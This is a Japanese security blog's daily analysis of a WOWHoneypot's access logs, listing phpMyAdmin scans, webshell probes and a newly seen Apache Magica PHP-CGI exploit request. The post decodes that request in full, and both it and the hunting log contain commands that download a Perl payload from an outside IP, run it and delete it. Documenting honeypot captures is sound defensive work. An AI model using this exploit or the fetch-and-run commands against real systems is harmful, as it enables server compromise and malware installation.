S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(26日目)

WOWhoneypotの2018/6/29(金)(運用26日目)の簡易分析です。

本日の総アクセス件数は220件です。

39 [2018-06-29 "GET /
14 [2018-06-29 "HEAD /
4 [2018-06-29 "GET /xampp/phpmyadmin/index.php
4 [2018-06-29 "GET /web/phpMyAdmin/index.php
4 [2018-06-29 "GET /tools/phpMyAdmin/index.php
4 [2018-06-29 "GET /pmd/index.php
4 [2018-06-29 "GET /pmamy/index.php
4 [2018-06-29 "GET /pmamy2/index.php
4 [2018-06-29 "GET /PMA/index.php
4 [2018-06-29 "GET /pma/index.php
4 [2018-06-29 "GET /PMA2/index.php
4 [2018-06-29 "GET /phpmyadmin-old/index.php
4 [2018-06-29 "GET /phpMyAdmin/index.php
4 [2018-06-29 "GET /phpmyadmin/index.php
4 [2018-06-29 "GET /phpMyadmin_bak/index.php
4 [2018-06-29 "GET /phpmyadmin2/index.php
4 [2018-06-29 "GET /phpmyadmin1/index.php
4 [2018-06-29 "GET /phpmyadmin0/index.php
4 [2018-06-29 "GET /phpma/index.php
4 [2018-06-29 "GET /mysql/index.php
4 [2018-06-29 "GET /myadmin/index.php
4 [2018-06-29 "GET /myadmin2/index.php
4 [2018-06-29 "GET /index.php
4 [2018-06-29 "GET /db/index.php
4 [2018-06-29 "GET /dbadmin/index.php
4 [2018-06-29 "GET /admin/PMA/index.php
4 [2018-06-29 "GET /admin/pma/index.php
4 [2018-06-29 "GET /admin/phpmyadmin/index.php
4 [2018-06-29 "GET /admin/mysql/index.php
4 [2018-06-29 "GET /admin/mysql2/index.php
4 [2018-06-29 "GET /admin/index.php
3 [2018-06-29 "GET /phpmyadmin/phpmyadmin/index.php
3 [2018-06-29 "GET /phpMyAdminold/index.php
3 [2018-06-29 "GET /phpadmin/index.php
3 [2018-06-29 "GET /admin/phpMyAdmin/index.php
2 [2018-06-29 "PROPFIND /
2 [2018-06-29 "POST /xx.php
2 [2018-06-29 "POST /xw.php
2 [2018-06-29 "POST /wuwu11.php
2 [2018-06-29 "POST /w.php
2 [2018-06-29 "POST /s.php
2 [2018-06-29 "POST /sheep.php
2 [2018-06-29 "POST /db_session.init.php
2 [2018-06-29 "POST /db.init.php
2 [2018-06-29 "GET /www/phpMyAdmin/index.php
2 [2018-06-29 "GET /webdav/
2 [2018-06-29 "GET /typo3/phpmyadmin/index.php
2 [2018-06-29 "GET /pma-old/index.php
2 [2018-06-29 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-29 "GET /phpMyAdmin.old/index.php
2 [2018-06-29 "GET /mysqladmin/index.php
2 [2018-06-29 "GET /mysql-admin/index.php
2 [2018-06-29 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-29 "GET /admin/phpmyadmin2/index.php
1 [2018-06-29 "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

phpMyAdmin関連と/を除外します。

2 [2018-06-29 "POST /xx.php
2 [2018-06-29 "POST /xw.php
2 [2018-06-29 "POST /wuwu11.php
2 [2018-06-29 "POST /w.php
2 [2018-06-29 "POST /s.php
2 [2018-06-29 "POST /sheep.php
2 [2018-06-29 "POST /db_session.init.php
2 [2018-06-29 "POST /db.init.php
2 [2018-06-29 "GET /webdav/
1 [2018-06-29 "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

新規のものは一番最後のものです。

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

<? system("cd /tmp ; wget hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr "); ?>

これはApache Magicaと呼ばれるPHP脆弱性を突いた攻撃です。

CGI版PHPに対する魔法少女アパッチマギカ攻撃を観測しました | 徳丸浩の日記

攻撃コードの部分は、恐らくは誰かのWordPressで作られたWebサイトが侵害され、マルウェア置き場になっているものと思われます…。

 

本日のハンティングログです。3つに見えますが、実際には一つです。

1 [2018-06-29 wget hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr
1 [2018-06-29 fetch hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr
1 [2018-06-29 curl -O hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227[.]132/ch/wp-admin/js/a/msr

以上です。